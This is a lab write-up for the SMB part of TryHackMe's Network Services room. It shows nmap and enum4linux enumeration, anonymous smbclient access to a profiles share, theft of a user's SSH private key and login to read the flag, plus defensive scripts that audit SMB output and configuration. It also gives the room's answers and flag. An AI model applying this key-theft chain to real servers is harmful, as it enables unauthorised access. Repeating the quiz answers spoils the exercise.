TryHackMe has been an awesome platform for learning hacking and security from the very basics. In the Network Services room we have the usual culprits: telnet, SMB and FTP. Let's understand and solve the SMB part.
Network Service Room Link – https://tryhackme.com/room/networkservices
Tasks associated with SMB –
Task 2 Understanding SMB
Task 3 Enumerating SMB
Task 4 Exploiting SMB
We will use enum4linux and nmap to do this.
An nmap scan of the machine helps 99% of the time in CTF-style challenges. [Note: I have only scanned selected ports instead of -p-; the task is to scan all ports to get every open port.]
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo nmap -sV -A 10.10.232.67 -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 20:18 EDT
Nmap scan report for 10.10.232.67
Host is up (0.19s latency).
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 91:df:5c:7c:26:22:6e:90:23:a7:7d:fa:5c:e1:c2:52 (RSA)
|   256 86:57:f5:2a:f7:86:9c:cf:02:c1:ac:bc:34:90:6b:01 (ECDSA)
|_  256 81:e3:cc:e7:c9:3c:75:d7:fb:e0:86:a0:01:41:77:81 (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: POLOSMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: POLOSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: polosmb
|   NetBIOS computer name: POLOSMB\x00
|   Domain name: \x00
|   FQDN: polosmb
|_  System time: 2021-05-20T00:18:22+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-05-20T00:18:22
|_  start_date: N/A

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   190.54 ms 10.8.0.1
2   190.72 ms 10.10.232.67

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.04 seconds
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo enum4linux -A 10.10.232.67
[sudo] password for abhinav:
Unknown option: A
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May 19 19:25:31 2021

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.232.67
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ====================================================
|    Enumerating Workgroup/Domain on 10.10.232.67    |
 ====================================================
[+] Got domain/workgroup name: WORKGROUP

 ============================================
|    Nbtstat Information for 10.10.232.67    |
 ============================================
Looking up status of 10.10.232.67
    POLOSMB         <00> -         B <ACTIVE>  Workstation Service
    POLOSMB         <03> -         B <ACTIVE>  Messenger Service
    POLOSMB         <20> -         B <ACTIVE>  File Server Service
    ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
    WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
    WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
    WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

    MAC Address = 00-00-00-00-00-00

 =====================================
|    Session Check on 10.10.232.67    |
 =====================================
[+] Server 10.10.232.67 allows sessions using username '', password ''

 ===========================================
|    Getting domain SID for 10.10.232.67    |
 ===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================
|    OS information on 10.10.232.67    |
 ======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.232.67 from smbclient:
[+] Got OS info for 10.10.232.67 from srvinfo:
    POLOSMB        Wk Sv PrQ Unx NT SNT polosmb server (Samba, Ubuntu)
    platform_id     :    500
    os version      :    6.1
    server type     :    0x809a03

 =============================
|    Users on 10.10.232.67    |
 =============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 =========================================
|    Share Enumeration on 10.10.232.67    |
 =========================================

    Sharename       Type      Comment
    ---------       ----      -------
    netlogon        Disk      Network Logon Service
    profiles        Disk      Users profiles
    print$          Disk      Printer Drivers
    IPC$            IPC       IPC Service (polosmb server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.232.67
//10.10.232.67/netlogon    [E] Can't understand response:
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
//10.10.232.67/profiles    Mapping: OK, Listing: OK
//10.10.232.67/print$    Mapping: DENIED, Listing: N/A
//10.10.232.67/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ====================================================
|    Password Policy Information for 10.10.232.67    |
 ====================================================
[+] Attaching to 10.10.232.67 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
    [+] POLOSMB
    [+] Builtin
[+] Password Info for Domain: POLOSMB
    [+] Minimum password length: 5
    [+] Password history length: None
    [+] Maximum password age: 37 days 6 hours 21 minutes
    [+] Password Complexity Flags: 000000
        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0
    [+] Minimum password age: None
    [+] Reset Account Lockout Counter: 30 minutes
    [+] Locked Account Duration: 30 minutes
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5

 ==============================
|    Groups on 10.10.232.67    |
 ==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:

 =======================================================================
|    Users on 10.10.232.67 via RID cycling (RIDS: 500-550,1000-1050)    |
 =======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-434125608-3964652802-3194254534
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
..
..
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
..
..
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-434125608-3964652802-3194254534 and logon username '', password ''
S-1-5-21-434125608-3964652802-3194254534-514 *unknown*\*unknown* (8)
S-1-5-21-434125608-3964652802-3194254534-515 *unknown*\*unknown* (8)
S-1-5-21-434125608-3964652802-3194254534-516 *unknown*\*unknown* (8)
..
..
S-1-5-21-434125608-3964652802-3194254534-550 *unknown*\*unknown* (8)
S-1-5-21-434125608-3964652802-3194254534-1000 *unknown*\*unknown* (8)
S-1-5-21-434125608-3964652802-3194254534-1001 *unknown*\*unknown* (8)
S-1-5-21-434125608-3964652802-3194254534-1002 *unknown*\*unknown* (8)
..
..
S-1-5-21-434125608-3964652802-3194254534-1046 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

 =============================================
|    Getting printer info for 10.10.232.67    |
 =============================================
No printers returned.

enum4linux complete on Wed May 19 19:43:45 2021

┌──(abhinav㉿ETHICALHACKX)-[~]
└─$
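Reading the two dumps above by eye is easy to get wrong, so here is an added example (my own code, not part of the room, of nmap or of enum4linux) that pulls the security-relevant facts out of them: the smb-security-mode / smb2-security-mode blocks from nmap, and the "Attempting to map shares" section from enum4linux. The excerpts embedded in it are constructed copies of the output above, and the function names are my own.

```python
import re

# Constructed excerpt modelled on the nmap host-script output shown above.
NMAP_SMB_EXCERPT = """\
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# Constructed excerpt modelled on the enum4linux share-mapping section above.
ENUM4LINUX_SHARES_EXCERPT = """\
[+] Attempting to map shares on 10.10.232.67
//10.10.232.67/netlogon\t[E] Can't understand response: tree connect failed: NT_STATUS_BAD_NETWORK_NAME
//10.10.232.67/profiles\tMapping: OK, Listing: OK
//10.10.232.67/print$\tMapping: DENIED, Listing: N/A
//10.10.232.67/IPC$\t[E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \\*
"""


def nmap_smb_findings(text):
    """Findings from nmap's smb-security-mode / smb2-security-mode script output."""
    findings = []
    if re.search(r"account_used:\s*guest", text):
        findings.append("guest session accepted by the SMB1 security-mode probe")
    if re.search(r"message_signing:\s*disabled", text):
        findings.append("SMB1 message signing disabled")
    if re.search(r"Message signing enabled but not required", text):
        findings.append("SMB2 message signing not required (relay-friendly)")
    return findings


# One mapping result per line: //host/share<whitespace>result text
SHARE_LINE = re.compile(r"^//[^/\s]+/(?P<share>\S+)\s+(?P<result>.+)$", re.M)


def null_session_shares(text):
    """Map share name -> 'listable' | 'mappable' | 'denied' | 'error' for a null session."""
    status = {}
    for m in SHARE_LINE.finditer(text):
        result = m["result"]
        if "Mapping: OK" in result and "Listing: OK" in result:
            state = "listable"
        elif "Mapping: OK" in result:
            state = "mappable"
        elif "DENIED" in result:
            state = "denied"
        else:
            state = "error"
        status[m["share"]] = state
    return status


def triage(nmap_text, enum_text):
    """Combine both tools' output into one short report."""
    shares = null_session_shares(enum_text)
    listable = sorted(name for name, state in shares.items() if state == "listable")
    return {
        "signing": nmap_smb_findings(nmap_text),
        "null_session_listable": listable,
        "shares": shares,
    }


if __name__ == "__main__":
    report = triage(NMAP_SMB_EXCERPT, ENUM4LINUX_SHARES_EXCERPT)
    for finding in report["signing"]:
        print("[!]", finding)
    for name in report["null_session_listable"]:
        print("[!] share listable with empty username/password:", name)
```

On this box the report carries three points a defender should act on: the server accepts guest sessions, neither SMB dialect requires signing, and the profiles share can be mapped and listed with an empty username and password.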
Conduct an nmap scan of your choosing, How many ports are open?
From the above results we can observe that 3 ports are open: 22, 139 and 445.
What ports is SMB running on? 139/445
nmap shows this directly.
Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name? WORKGROUP
from enum4linux
What comes up as the name of the machine? POLOSMB
from enum4linux
What operating system version is running? 6.1
Under OS Information in enum4linux
What share sticks out as something we might want to investigate? profiles
from the enum4linux share enumeration (Sharename column)
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ smbclient //10.10.232.67/profiles -U Anonymous
Enter WORKGROUP\Anonymous's password:
Try "help" to get a list of possible commands.
smb: \> get "Working From Home Information.txt"
getting file \Working From Home Information.txt of size 358 as Working From Home Information.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> help
?              allinfo        altname        archive        backup
blocksize      cancel         case_sensitive cd             chmod
chown          close          del            deltree        dir
du             echo           exit           get            getfacl
geteas         hardlink       help           history        iosize
lcd            link           lock           lowercase      ls
l              mask           md             mget           mkdir
more           mput           newer          notify         open
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir
posix_unlink   posix_whoami   print          prompt         put
pwd            q              queue          quit           readlink
rd             recurse        reget          rename         reput
rm             rmdir          showacls       setea          setmode
scopy          stat           symlink        tar            tarmode
timeout        translate      unlock         volume         vuid
wdel           logon          listconnect    showconnect    tcon
tdis           tid            utimes         logoff         ..
!
smb: \> ls
  .                                   D        0  Tue Apr 21 07:08:23 2020
  ..                                  D        0  Tue Apr 21 06:49:56 2020
  .cache                             DH        0  Tue Apr 21 07:08:23 2020
  .profile                            H      807  Tue Apr 21 07:08:23 2020
  .sudo_as_admin_successful           H        0  Tue Apr 21 07:08:23 2020
  .bash_logout                        H      220  Tue Apr 21 07:08:23 2020
  .viminfo                            H      947  Tue Apr 21 07:08:23 2020
  Working From Home Information.txt      N      358  Tue Apr 21 07:08:23 2020
  .ssh                               DH        0  Tue Apr 21 07:08:23 2020
  .bashrc                             H     3771  Tue Apr 21 07:08:23 2020
  .gnupg                             DH        0  Tue Apr 21 07:08:23 2020

        12316808 blocks of size 1024. 7584016 blocks available
smb: \> cd .ssh
smb: \.ssh\> ls
  .                                   D        0  Tue Apr 21 07:08:23 2020
  ..                                  D        0  Tue Apr 21 07:08:23 2020
  id_rsa                              A     1679  Tue Apr 21 07:08:23 2020
  id_rsa.pub                          N      396  Tue Apr 21 07:08:23 2020
  authorized_keys                     N        0  Tue Apr 21 07:08:23 2020

        12316808 blocks of size 1024. 7584016 blocks available
smb: \.ssh\> tar c thmNetwork.tar
NT_STATUS_ACCESS_DENIED opening remote file \.ssh\authorized_keys
tar: dumped 2 files and 0 directories
Total bytes written: 2075 (0.0 MiB/s)
smb: \.ssh\>

┌──(abhinav㉿ETHICALHACKX)-[~/thm]
└─$ cat 'Working From Home Information.txt'
John Cactus,

As you're well aware, due to the current pandemic most of POLO inc. has insisted that, wherever possible, employees should work from home. As such- your account has now been enabled with ssh access to the main server.

If there are any problems, please contact the IT department at it@polointernalcoms.uk

Regards,

James
Department Manager

┌──(abhinav㉿ETHICALHACKX)-[~/thm]
└─$ ls
thmNetwork.tar  'Working From Home Information.txt'

┌──(abhinav㉿ETHICALHACKX)-[~/thm]
└─$ tar -xvf thmNetwork.tar
./.ssh/id_rsa
./.ssh/id_rsa.pub

┌──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh]
└─$ chmod 600 id_rsa

┌──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh]
└─$ ls -la
total 16
drwxr-xr-x 2 abhinav abhinav 4096 May 19 20:59 .
drwxr-xr-x 3 abhinav abhinav 4096 May 19 20:59 ..
-rw------- 1 abhinav abhinav 1679 Apr 21  2020 id_rsa
-rw-r--r-- 1 abhinav abhinav  396 Apr 21  2020 id_rsa.pub

┌──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh]
└─$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDb7OaL8zLZ5Z8OU3wZPSIQHaoyI8Yc3I/8/Y6faWgYTZbfNPexli0jxdAeTeGy2X3XACWcB4HFejbiNsMYLjy517gwWKPBvN865i8uIQ0Gqayq/KmBHpuBbR0yX/SpyfyvzR3VD16pg/D+WT8hLaNHSYm6FNYLsmVnWDSJDBhS179czftuoW55mw/OqzWVr5ln9cKeeuXlNV1lqCjBqF3ClzEBvN4JW8GS/riLTeHcXeMIMUTuIpr4XovN/VivIlLqTYy7lHuUh6L2RqAfw5+FSr4QZW1zHCMoS6FooTomq/03EGJCGcp80/fT0e04n+7+PxnmvZQkOwe1A1hUG6C/ cactus@polosmb

┌──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh]
└─$ ssh -i id_rsa cactus@10.10.232.67
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu May 20 01:14:01 UTC 2021

  System load:  0.0               Processes:           94
  Usage of /:   33.3% of 11.75GB  Users logged in:     0
  Memory usage: 17%               IP address for eth0: 10.10.232.67
  Swap usage:   0%

22 packages can be updated.
0 updates are security updates.

Last login: Tue Apr 21 11:19:15 2020 from 192.168.1.110
cactus@polosmb:~$ ls -l
total 4
-rw-r--r-- 1 root root 20 Apr 21  2020 smb.txt
cactus@polosmb:~$ cat smb.txt
THM{smb_is_fun_eh?}
cactus@polosmb:~$

Task 4
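The two directory listings in the session above are the whole finding: a user's home directory, .ssh/id_rsa included, served over a share that accepts an anonymous login. As an added example (my own code, not part of the room or of smbclient), this parses smbclient "ls" output and flags the entries an administrator should never find on an anonymously accessible share. The listings are constructed copies of the ones above, and the function and constant names are my own.

```python
import re

# Constructed listing modelled on the share root shown above (a few entries omitted).
ROOT_LISTING = """\
  .                                   D        0  Tue Apr 21 07:08:23 2020
  ..                                  D        0  Tue Apr 21 06:49:56 2020
  .cache                             DH        0  Tue Apr 21 07:08:23 2020
  .profile                            H      807  Tue Apr 21 07:08:23 2020
  .viminfo                            H      947  Tue Apr 21 07:08:23 2020
  Working From Home Information.txt      N      358  Tue Apr 21 07:08:23 2020
  .ssh                               DH        0  Tue Apr 21 07:08:23 2020
  .bashrc                             H     3771  Tue Apr 21 07:08:23 2020
  .gnupg                             DH        0  Tue Apr 21 07:08:23 2020

\t\t12316808 blocks of size 1024. 7584016 blocks available
"""

# Constructed listing modelled on the .ssh directory shown above.
SSH_LISTING = """\
  .                                   D        0  Tue Apr 21 07:08:23 2020
  ..                                  D        0  Tue Apr 21 07:08:23 2020
  id_rsa                              A     1679  Tue Apr 21 07:08:23 2020
  id_rsa.pub                          N      396  Tue Apr 21 07:08:23 2020
  authorized_keys                     N        0  Tue Apr 21 07:08:23 2020
"""

# smbclient prints: <name> <attribute letters> <size> <weekday month day hh:mm:ss year>
LS_LINE = re.compile(
    r"^\s*(?P<name>.+?)\s+(?P<attrs>[A-Z]*)\s+(?P<size>\d+)\s+"
    r"(?P<date>\w{3}\s+\w{3}\s+\d+\s+[\d:]+\s+\d{4})\s*$"
)


def parse_smbclient_ls(text):
    """Turn smbclient 'ls' output into a list of entries; summary lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue
        entries.append({
            "name": m["name"],
            "is_dir": "D" in m["attrs"],
            "hidden": "H" in m["attrs"],   # hidden attribute, still readable over SMB
            "size": int(m["size"]),
        })
    return entries


# Names that should never sit on an anonymously readable share.
PRIVATE_KEY = re.compile(r"^(id_(rsa|dsa|ecdsa|ed25519)|.+\.(pem|key|ppk))$")
SENSITIVE_DIRS = {".ssh": "ssh key directory", ".gnupg": "GnuPG keyring directory"}
SENSITIVE_FILES = {
    ".bash_history": "shell history",
    ".viminfo": "editor history (may contain file contents)",
    ".netrc": "stored credentials",
}


def audit_listing(text, base="\\"):
    """Return (path, reason) pairs for entries that expose key material or history."""
    hits = []
    for entry in parse_smbclient_ls(text):
        name = entry["name"]
        if name in (".", ".."):
            continue
        path = base + name
        if entry["is_dir"] and name in SENSITIVE_DIRS:
            hits.append((path, SENSITIVE_DIRS[name]))
        elif not entry["is_dir"] and PRIVATE_KEY.match(name):
            hits.append((path, "private key"))
        elif not entry["is_dir"] and name in SENSITIVE_FILES:
            hits.append((path, SENSITIVE_FILES[name]))
    return hits


if __name__ == "__main__":
    for path, reason in audit_listing(ROOT_LISTING) + audit_listing(SSH_LISTING, base="\\.ssh\\"):
        print(f"[!] {path}: {reason}")
```

Note that the "H" attribute on .ssh and .viminfo hides them from a casual Windows Explorer view but does nothing against smbclient, which is why the audit ignores it. The public key (id_rsa.pub) is deliberately not flagged: the private half is the leak.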
Okay, so we got in there via smbclient.
We got the files we needed, either with -c or by tarring up the ssh keys.
On the local host we can view id_rsa.pub to see that the ssh username is cactus; the end of the file reads cactus@YOUR_MACHINE_IP.
We log in using ssh -i id_rsa cactus@Machine_IP.
Next we ls to see a file smb.txt, which we cat smb.txt to get the flag.
What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?
smbclient //MACHINE_IP/secret -U suit -p 445
Does the share allow anonymous access? Y/N?
Y
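The share answers "Y" because of how it is configured on the server side. As an added example (my own code; the smb.conf text is constructed to mirror the share names seen on this box and is not the room's real configuration), this audits a Samba config for the settings behind the findings above and shows a hardened version beside the weak one. The parameter names are real Samba options; the function names are my own.

```python
import configparser

# Constructed: a configuration that would produce what enum4linux and smbclient saw above.
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   map to guest = bad user
   server signing = auto

[profiles]
   comment = Users profiles
   path = /home/cactus
   browseable = yes
   guest ok = yes
   read only = yes
"""

# Constructed: the same share with guest access removed and signing enforced.
HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   map to guest = never
   restrict anonymous = 2
   server signing = mandatory
   server min protocol = SMB3

[profiles]
   comment = Users profiles
   path = /srv/samba/profiles
   browseable = no
   guest ok = no
   read only = yes
   valid users = @staff
"""

TRUE_WORDS = {"yes", "true", "1"}
SMB1_DIALECTS = {"CORE", "COREPLUS", "LANMAN1", "LANMAN2", "NT1"}


def _truthy(value):
    """Samba boolean parsing: yes/true/1 are true, anything else false."""
    return value.strip().lower() in TRUE_WORDS


def audit_smb_conf(text):
    """Return a list of human-readable findings for an smb.conf given as text."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string(text)
    findings = []

    g = cp["global"] if cp.has_section("global") else {}
    if g.get("map to guest", "never").strip().lower() != "never":
        findings.append("global: 'map to guest' turns failed logons into guest sessions")
    if g.get("server signing", "default").strip().lower() != "mandatory":
        findings.append("global: 'server signing' is not mandatory, so signing can be negotiated away")
    if g.get("server min protocol", "").strip().upper() in SMB1_DIALECTS:
        findings.append("global: 'server min protocol' still permits SMB1")

    for share in cp.sections():
        if share == "global":
            continue
        s = cp[share]
        # 'public' is a Samba synonym for 'guest ok'
        guest = _truthy(s.get("guest ok", "no")) or _truthy(s.get("public", "no"))
        if guest:
            writable = (_truthy(s.get("writable", "no")) or _truthy(s.get("writeable", "no"))
                        or not _truthy(s.get("read only", "yes")))
            level = "writable" if writable else "read-only"
            findings.append(f"share [{share}]: guest access allowed ({level})")
        if s.get("path", "").startswith("/home/") and s.get("valid users") is None:
            findings.append(f"share [{share}]: exports a home directory without 'valid users'")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(f"== {label} ==")
        for finding in audit_smb_conf(conf) or ["no findings"]:
            print(" -", finding)
```

The weak config yields four findings: guest mapping, non-mandatory signing, a guest-readable share, and a home directory exported without a user list. The hardened one yields none, and the profiles share moves out of /home so that dotfiles such as .ssh and .viminfo are never in the exported tree at all.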
Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
John Cactus
#from the Working From Home Information.txt file
What service has been configured to allow him to work from home?
ssh
#from the Working From Home Information.txt file
Okay! Now we know this, what directory on the share should we look in?
.ssh
#as we now know, ssh keys are likely to be present in ~/.ssh
This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
id_rsa
#id_rsa is the default name for an RSA ssh private key
What is the smb.txt flag?
THM{smb_is_fun_eh?}
#view id_rsa.pub to get the username, connect by ssh, then ls and cat to see the flag
I will update the sections on Telnet and FTP soon.